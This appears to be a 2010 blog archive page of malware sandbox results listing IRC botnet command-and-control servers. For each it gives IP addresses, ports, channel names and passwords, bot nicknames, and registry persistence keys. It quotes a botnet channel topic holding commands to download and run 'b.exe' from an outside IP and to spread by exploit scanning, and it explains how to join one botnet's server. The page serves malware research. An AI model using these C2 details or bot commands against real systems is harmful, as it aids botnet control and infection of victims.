Month: August 2010

ms4all.twoplayers.net

Remote Host Port Number 112.78.112.208 80 218.5.74.190 80 91.212.127.147 80 204.45.85.210 57221 54.59.85ae.static.theplanet.com 25 209.85.97.106 25 65.55.92.152 25 66.94.237.64 25 70.87.6.99 25 MODE #! -ix MODE #Ma -ix USER SP2-285 * 0 :COMPUTERNAME MODE [N00_USA_XP_0571683] @ -ix MODE #dpi -ix channel: #dpi and #! idle87 changes topic to ‘.asc -S|.asc exp_all 25 2 0 -a

212.95.45.107

Remote Host Port Number 212.95.45.107 6567 NICK {XPUSA661553} JOIN #kavtodio2 PONG fatalz.net USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA661553} -ix Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Services = “svchots.exe” so that svchots.exe runs every time Windows starts o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + Windows Update = “%Temp%svchots.exe” so that svchots.exe runs

88.255.104.171

Remote Host Port Number 88.255.104.171 81 NICK [N00_USA_XP_5511946] USER SP2-756 * 0 :COMPUTERNAME * The following port was open in the system: Port Protocol Process 1053 TCP Zsnkspm.exe (%System%Zsnkspm.exe) Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun] + Microsoft Driver Setup

93.174.94.86

Remote Host Port Number 208.43.36.96 80 93.174.94.86 1234 PASS xxx PONG 22 MOTD NICK [USA|00|P|86953] USER XP-0557 * 0 :COMPUTERNAME MODE [USA|00|P|86953] -ix JOIN #!wm! test Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Java developer Script Browse = “[file and pathname of the sample #1]” so that [file and pathname

onefucker.mine.nu

Resolved : [onefucker.mine.nu] To [203.153.116.155] Remote Host Port Number 203.153.116.155 6667 NICK UserName10 USER UserName10 “hotmail.com” “onefucker.mine.nu” :UserName JOIN #spy chanpass MODE UserName10 +i MODE #spy +nts Registry Modifications * The following Registry Key was created: o HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Winsock2 driver = “_1.EXE” o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce] +

ms.mobilerequests.com(butterfly bot again)

ms.mobilerequests.com – Unknown UDP Traffic: 89.149.223.140:1863 State: Normal establishment and termination – Transferred outbound Bytes: 76 – Transferred inbound Bytes: 58 here all results from exe scan http://anubis.iseclab.org/?action=result&task_id=1952d1a31ce718b74b9557b86d5f9f90d&format=html#id369875

ff.fjpark.com(maybe another mariposa botnet)

this bot have udp protocol wich is similar to mariposa and the net is very large DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.6.2 ff.fjpark.com 98.126.180.250 208.53.183.124 208.53.183.124 74.63.78.27 74.63.78.27 208.53.183.92 208.53.183.92 UDP Connections Remote IP Address: 98.126.180.250 Port: 9955 Send Datagram: packet(s) of size 21 Send Datagram: 7 packet(s) of size 10 Send Datagram:

ms4all.twoplayers.net(very big botnet)

This one is special because u have to make some modifications on your irc client to join the server ms4all.twoplayers.net DNS_TYPE_A 204.45.85.218 109.196.130.50 109.196.130.66 204.45.85.210 204.45.85.218:57221 PASS laorosr Channel#dpi Channel#! Now talking in #! Topic is ‘.asc -S|.http http://208.53.183.101/b.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20

80.247.72.130

Remote Host Port Number 80.247.72.130 3305 PASS secretpass NICK P|v403incrp USER x6yyqf02y * 0 :USA|XP|257 USERHOST P|v403incrp MODE P|v403incrp JOIN #mm RSA Other details * The following ports were open in the system: Port Protocol Process 69 UDP unwise_.exe (%FontsDir%unwise_.exe) 1055 TCP unwise_.exe (%FontsDir%unwise_.exe) 11030 TCP unwise_.exe (%FontsDir%unwise_.exe) Registry Modifications * The following Registry Keys

210.166.223.51

Remote Host Port Number 210.166.223.51 3305 PASS secretpass NICK P|b2s5zj80q USER cb5tcxdf2 * 0 :USA|XP|373 USERHOST P|b2s5zj80q MODE P|b2s5zj80q JOIN #mm RSA Other details * The following ports were open in the system: Port Protocol Process 69 UDP unwise_.exe (%FontsDir%unwise_.exe) 1052 TCP unwise_.exe (%FontsDir%unwise_.exe) 1138 TCP unwise_.exe (%FontsDir%unwise_.exe) 1139 TCP unwise_.exe (%FontsDir%unwise_.exe) 1140 TCP unwise_.exe